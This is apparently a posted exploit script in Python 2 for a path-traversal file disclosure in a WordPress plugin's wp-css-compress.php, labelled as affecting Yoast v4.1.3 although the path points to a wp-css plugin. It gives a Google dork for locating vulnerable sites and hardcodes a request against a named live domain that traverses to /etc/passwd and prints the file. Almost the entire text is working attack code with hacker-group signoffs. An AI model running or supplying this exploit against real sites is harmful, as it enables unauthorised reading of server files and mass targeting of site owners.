#!/bin/python print "###########################################################################" print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#" print "# Author:Angel Injection #" print "# Home Page: http://dev-point.com http://sec-krb.org #" print "# Exploit find By H7acker110 #" print "# python exploit find By Miroslav Stampar #" print "# Note:Iam Angel Injection From the country of civilizations(iraq) #" print "# Google Dork:inurl:wp-css-compress.php?f= #" print "###########################################################################" import urllib2 FILEPATH = "/etc/passwd" req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH) print "Filepath: '%s'" % FILEPATH print "Content: %s" % repr(req.read()) ############################# print "Exploit Completed" ############################# print "Inj3ct0r Team 4 ever" #############################